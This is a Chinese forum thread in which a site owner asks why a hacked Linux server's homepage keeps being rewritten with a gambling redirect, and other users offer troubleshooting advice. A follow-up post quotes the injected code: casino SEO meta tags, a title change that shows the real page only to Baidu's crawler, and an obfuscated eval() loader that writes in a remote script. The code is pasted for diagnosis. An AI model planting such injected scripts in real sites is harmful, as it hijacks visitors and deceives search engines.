求助,服务器被黑了,首页一直被修改加上一个转到某个博彩网址的 js,我把文件调成只读都没用,有思路是什么原因吗?
doufenger · 2018-08-17 17:04:19 +08:00 · 8707 次点击这是一个创建于 2290 天前的主题,其中的信息可能已经有所发展或是发生改变。
第 1 条附言 · 2018-08-18 16:46:22 +08:00
感谢各位大佬,提供了很多个思路,我慢慢排查看先吧。 目前先换了服务器,可能存在问题的 PHP 就不放上去了。
第 2 条附言 · 2018-08-18 16:53:13 +08:00
我服务器是 linux 的
第 3 条附言 · 2018-08-19 11:24:32 +08:00
我换了服务器隐藏好 IP 了还是别挂了。被挂马的静态页被加了这样的代码
<meta name="keywords" content="澳门威尼斯在线平台,威尼斯网上娱乐平台,威尼斯平台官网,威尼斯游戏平台,威尼斯 "/>
<meta name="description" content="【wnsr484.com】威尼斯人官方网可以让国内的很多游戏玩家都开始喜好上这种娱乐游戏体验方式。这是人们拥有完美业余生活的有效途径。这对改善生活质量的作用非常的重要。"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>
<meta name="keywords" content="澳门威尼斯在线平台,威尼斯网上娱乐平台,威尼斯平台官网,威尼斯游戏平台,威尼斯 "/>
<meta name="description" content="【wnsr484.com】威尼斯人官方网可以让国内的很多游戏玩家都开始喜好上这种娱乐游戏体验方式。这是人们拥有完美业余生活的有效途径。这对改善生活质量的作用非常的重要。"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>
 |
1
sabermiao 2018-08-17 17:08:03 +08:00
location.href?
XSS? |
 |
2
doufenger OP @sabermiao 他加的跳转代码删了就行了,关键是我改了服务器密码 FTP 密码什么的 文件调成只读了 都没有作用,他还是会改回来。
|
 |
3
Devilker 2018-08-17 17:16:39 +08:00
目测 数据库被加入代码了
只要一更新网站就会再次加上 |
 |
4
helionzzz 2018-08-17 17:18:22 +08:00
先彻查服务器里的 php 文件 之后再改代码什么的
|
 |
5
zarte 2018-08-17 17:34:52 +08:00
管理员权限被人拿了你调权限有啥用。。
|
 |
6
keramist 2018-08-17 17:39:04 +08:00 via Android
需要运维 wx: antcars 可长期 可一次性
|
 |
7
webjin1 2018-08-17 18:01:21 +08:00
前面套一个 WAF
|
 |
8
zjp 2018-08-17 18:22:33 +08:00 via Android
root: 啥只读
按惯例不应该是重装系统吗 |
 |
9
caola 2018-08-17 18:30:46 +08:00
自己的网站被黑还检查不出什么问题?。。。
|
 |
10
zhenghao110 2018-08-17 19:04:45 +08:00 via Android
@zjp 😂
|
 |
11
yongxa 2018-08-17 19:20:34 +08:00 via Android
cron ?
|
 |
12
sorcerer 2018-08-17 19:26:27 +08:00 via Android
网站被放后门了吧
|
 |
13
gamexg 2018-08-17 19:33:09 +08:00
心太大了吧?
被黑第一步排查原因,第二部重做系统。 加只读是什么操作? |
 |
15
beastk 2018-08-17 20:18:57 +08:00 via iPhone
查日志看下怎么进来的,打补丁,做安全措施。
|
 |
16
luboyan 2018-08-17 20:29:22 +08:00
我也遇到之前两个月,我遇到的是 PHP 的一个文件有后门。wordpress 下载第三方模版时候带来的
|
 |
17
ccc008 2018-08-17 20:32:05 +08:00
我们公司也遇到过。清理所有 php 后门后还有。后来排查发现远程密码泄露了。233
|
 |
18
haimall 2018-08-17 20:32:49 +08:00 via Android
先学习什么是后门,现在一般留 2-3 个后门的。 仔细检查下吧
|
 |
19
godgrp 2018-08-17 20:41:32 +08:00 via Android
有可能 dns 劫持,上 https
|
 |
20
mdos 2018-08-17 20:47:20 +08:00
文件先备份,然后重装服务器,密码都改掉,然后排查文件。等文件确认无后门后在传回服务器。
|
 |
21
yanaraika 2018-08-17 20:51:38 +08:00
一定要备份已有代码、格盘、手动检查所有代码、重装服务器
|
 |
22
houyujiangjun 2018-08-17 21:42:46 +08:00
明显是 cdn 劫持,上证书吧 骚年
|
 |
23
iMusic 2018-08-17 21:43:48 +08:00
像电信搞的鬼
|
 |
24
mytsing520 2018-08-17 21:52:28 +08:00
1.检查 rewrite ;
2.检查代码; 3.检查数据库 |
 |
25
ztaosony 2018-08-17 22:24:47 +08:00
先检查有没有后门,然后把所有的密码都改一遍
|
 |
26
1nclude 2018-08-17 22:30:18 +08:00
先查杀下 webshell,然后查看下日志,看看是怎么进来的
|
 |
27
toarufan 2018-08-17 22:59:13 +08:00
难道不是 http 劫持了,上 https 吧
|
 |
28
Akkuman 2018-08-17 23:22:37 +08:00 via Android
看起来像是 http 劫持,之前碰到过这种情况,上 https
|
 |
29
feifei8868 2018-08-17 23:35:01 +08:00  1
换个网络环境看一下,例如 电信有换联通或移动 看一下 如果只有一家服务商或一家的一个地区基本就确定是劫持,如果确定是了 就上 HTTPS 了 如果不是劫持,就"找人"检查程序服务器了
|
 |
30
LvMax 2018-08-18 00:00:54 +08:00 via iPhone
D 盾扫服务器 找有没有 shell 其他的再说 基本上是被写 shell 了
|
 |
31
a516307724 2018-08-18 10:49:45 +08:00
看起来像是 网络劫持,换个网络环境看看吧
|
 |
32
ddzzhen 2018-08-18 11:06:24 +08:00
full ssl
|
 |
33
abccccabc 2018-08-18 14:19:11 +08:00
楼主,查出来问题了没有?
|
 |
34
VgV 2018-08-18 15:27:15 +08:00
瑟瑟发抖,加个只读这个操作真是可怕。。
ps:楼上说的 http 劫持,能跳到菠菜?那有关部门第一时间就上门查运营商水表。 |
 |
35
hu5ky 2018-08-18 15:36:40 +08:00
什么原因可以自己查日志分析怎么入侵的啊,,你这个什么逻辑????
|
 |
36
uptime 2018-08-18 15:56:01 +08:00
格盘重装也有说的……
|
 |
38
laolinn 2018-08-18 22:42:48 +08:00 via iPhone
首先确认一下 PHP 环境是不是用了那些什么一键搭配来弄的,是的话赶紧换掉。看看日志文件有什么可疑地方,最后就是找时间把网站的漏洞修复一下
|
 |
39
llllllLllll 2018-08-19 08:54:03 +08:00
看一下有没有异常进程
|
|
40
doufenger OP 我把被串改的代码贴到补充了 哪位大神看看
|
Select Language